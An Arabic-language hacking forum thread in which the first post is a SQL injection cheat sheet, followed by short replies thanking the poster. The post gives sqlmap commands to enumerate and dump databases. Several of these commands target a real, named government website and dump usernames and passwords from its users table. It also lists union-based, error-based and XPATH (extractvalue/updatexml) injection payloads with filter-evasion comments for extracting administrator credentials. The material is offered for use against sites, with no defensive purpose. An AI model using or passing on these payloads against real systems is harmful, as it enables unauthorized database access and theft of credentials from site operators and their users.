الوسوم:
حالة الموضوع:
مغلق
  1. Injection

    Injection Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    3
    الوظيفة:
    *******
    الإقامة:
    iq-t34m
    [​IMG]

    السلام عليكم ورحمة الله تعالى وبركاته

    اقدم لكم بعض الأوامر المهمه
    الآوامر

    1 - Sqlmap
    2 - Sqlmap post
    3 - union based
    4 - Error Based
    5 - XPATH extractvalue
    6 - XPATH UpdateXML


    [​IMG]
    نبدأ على بركة الله
    :

    1 - Sqlmap

    كود PHP:
    لاستخراج قواعد البيانات :

    python sqlmap.py -[TARGET] --dbs

    \\\\\\\///////

    لاستخراج الجداول من قاعدة بيانات :

    python sqlmap.py -[TARGET] -[DATABASE] --tables

    \\\\\\\///////

    لاستخراج الاعمدة من الجدول :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] --columns

    \\\\\\\///////

    لاستخراج البيانات من الاعمدة :

    python sqlmap.py -[TARGET] -[DATABASE] -[TABLE] -[Col1,Col2,Col3] --dump
    [​IMG]

    2 - Sqlmap post

    كود PHP:
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email --dbs
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation --tables
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users --columns
    ---------------------
    sqlmap.py -"http://www.nlm.gov.mm/index.php?optio" --data="name=cloudx&email=cloudx&Submit=*Submit&option=com_ccnewsletter&task=addS*ubscriber" -p email -D 713893_justnation -T jos_users -C username,password --dump
    [​IMG]

    3 - union based

    كود PHP:
    استخراج عدد الاعمدة :

    +
    /*!order+by*/+NUMBER--

    استخراج العمود المصاب :

    /**/union/*!50000select*/+NUM,NUM,NUM--

    استخراج اصدار القاعدة :

    /**/union/*!50000select*/+1,/*!version()*/,3,4,5,6,7,8--

    اصدار اسم القاعدة :

    /**/union/*!50000select*/ 1,/*!database()*/,3,4,5,6,7,8--

    استخراج الجداول :

    group_concat(table_name)

    +
    from+information_schema.tables+where+table_schema=database()--

    استخراج الاعمدة :

    group_concat(column_name)

    +
    from+information_schema.columns+where+table_name=0xTABLE_HEX

    تشفير الجدول بالهيكس 
    http://www.waraxe.us/sql-char-encoder.html

    استخراج البيانات :

    +
    group_concat(COLUMNS)

    +
    from+TABLE_NAME
    [​IMG]

    4 - Error Based

    كود PHP:
    اصدار القاعدة :

    or 
    1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


    ============

    قاعدة البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ===========

    استخراج الجداول :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نقوم بالتلاعب بـ limit للوصول الى الجدول المطلوب
    ===========

    استخراج الاعمدة :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLENAMEHERE limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    ملاحظة ضروري تشفير الجداول بالهيكس :

    http://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول الى الاعمدة المطلوبة
    ==========

    استخراج البيانات :

    and (
    select 1 from (select count(*),concat((select(select concat(cast(concat(admin_NAME,0x7e,admin_PWD) as char),0x7e)) from Ignotus_1.tbl_userADMINS limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    نتلاعب بـ limit للوصول الى كافة البيانات

    Ignotus_1
    .tbl_userADMINS

    مكان Ignotus_1 
    نضع اسم قاعدة البيانات
    مكان tbl_userADMINS 
    نضع اسم الجدول

    [​IMG]

    5 -XPATH extractvalue

    كود PHP:
    اصدار القاعدة :

    +and+
    extractvalue(rand(),concat(0x7e,version()))--

    -----------------------
    قاعدة البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,database()))--

    -----------------------

    الجداول :

    +and+
    extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

    -----------------------

    الاعمدة :

    +and+
    extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1)))--  

    *
    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    -----------------------

    البيانات :

    +and+
    extractvalue(rand(),concat(0x7e,(select+concat(name,0x7e,password)+from+administrator_account+limit+0,1)))--
    [​IMG]

    6 - XPATH UpdateXML

    كود PHP:
    استخراج اصدار قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(version())),0)--

    ------------------------

    استخراج قاعدة البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,(database())),0)--

    ------------------------

    استخراج الجداول :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--  

    نتلاعب بالـ limit للوصول الى الجدول المطلوب !

    ------------------------

    استخراج الاعمدة :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=TABLE_HEX+limit+0,1))),0)--  

    تشفير الجدول بالهيكس

    http
    ://www.waraxe.us/sql-char-encoder.html

    نتلاعب بالـ limit للوصول للاعمدة المطلوبة !

    -----------------------

    استخراج البيانات :

    +and+
    updatexml(0x7e,concat(0x7e,((select+concat(column,0x7e,column)+from+table+limit+0,1))),0)--

    [​IMG]

    بالتوفيق لكم اخواني :{y.}
     
  2. Đѓ.Đ4řķ

    Đѓ.Đ4řķ Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    49
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    .♥ آلسعودية ♥.
    رد: أهم اوامر الحقن

    بارك الله فيك وجزاك خير الجزاء
     
  3. нάсќɇя

    нάсќɇя Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    فيـ قلبكـ
    رد: أهم اوامر الحقن

    شكرا لك ياغالي بارك الله فيك​
     
  4. كراش المحارب

    كراش المحارب DeveloPer Plus

    الأنتساب:
    ‏26 ديسمبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ksa
    رد: أهم اوامر الحقن

    تسلم أيدك يا بطل &:"
     
  5. El Mejor

    El Mejor Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    72
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    8
    الوظيفة:
    Hacker
    الإقامة:
    المــــــغــــــرب
    رد: أهم اوامر الحقن

    بطل الله يعطيك العافيه​
     
  6. jőŐőķєя

    jőŐőķєя Developer

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    56
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طآلب , ثآنوي ..●
    الإقامة:
    في عالم لا يسكنه غيريُ
    رد: أهم اوامر الحقن

    سلمت يداك على الطرح الراقي أخي

    ودي وإحترامي لك :{8}:​
     
  7. D 1 r k

    D 1 r k DeveloPer Plus

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    141
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الوظيفة:
    Currently Student
    الإقامة:
    United States
    رد: أهم اوامر الحقن

    بطل حبيبي واصل تفوقك :ُok:ٌ
     
  8. ★ قبعة القش ★

    ★ قبعة القش ★ V • I • P

    الأنتساب:
    ‏10 مايو 2014
    المشاركات:
    447
    الإعجابات المتلقاة:
    16
    نقاط الجائزة:
    18
    رد: أهم اوامر الحقن

    شرح جميل و معلومات قيمة تسلم إيدك )5:")5:")5:"

    تسلم إيدك حبيبي )5:")5:":{7}::{7}:
     
  9. صدام السقاف

    صدام السقاف ExpErt DeveloPer

    الأنتساب:
    ‏11 يونيو 2014
    المشاركات:
    252
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    رد: أهم اوامر الحقن

    بارك الله فيك اخى الكريم فعلاً اوامر وشرح وافي وكافي ماقصرت اخى الكريم
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة